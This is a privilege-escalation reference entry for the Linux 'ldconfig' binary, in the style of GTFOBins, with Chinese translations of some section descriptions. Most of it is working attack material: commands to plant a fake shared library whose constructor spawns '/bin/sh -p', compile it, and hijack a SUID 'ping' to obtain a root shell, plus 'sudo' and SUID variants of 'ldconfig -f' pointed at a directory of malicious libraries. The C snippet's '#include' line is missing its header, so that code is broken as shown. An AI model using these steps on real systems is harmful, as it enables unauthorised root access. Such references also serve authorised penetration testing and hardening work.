.. / ldconfig

Follows a minimal example of how to use the described technique (details may change across different distributions). Run the code associated with the technique. Identify a target SUID executable, for example the `libcap` library of `ping`: ``` $ ldd /bin/ping | grep libcap libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000) ``` Create a fake library that spawns a shell at bootstrap: ``` echo '#include __attribute__((constructor)) static void init() { execl("/bin/sh", "/bin/sh", "-p", NULL); } ' >"$TF/lib.c" ``` Compile it with: ``` gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2" ``` Run `ldconfig` again as described below then just run `ping` to obtain a root shell: ``` $ ping # id uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user) ```

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.
```
TF=$(mktemp -d)
echo "$TF" > "$TF/conf"
# move malicious libraries in $TF
sudo ldconfig -f "$TF/conf"
```

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.
```
TF=$(mktemp -d)
echo "$TF" > "$TF/conf"
# move malicious libraries in $TF
./ldconfig -f "$TF/conf"
```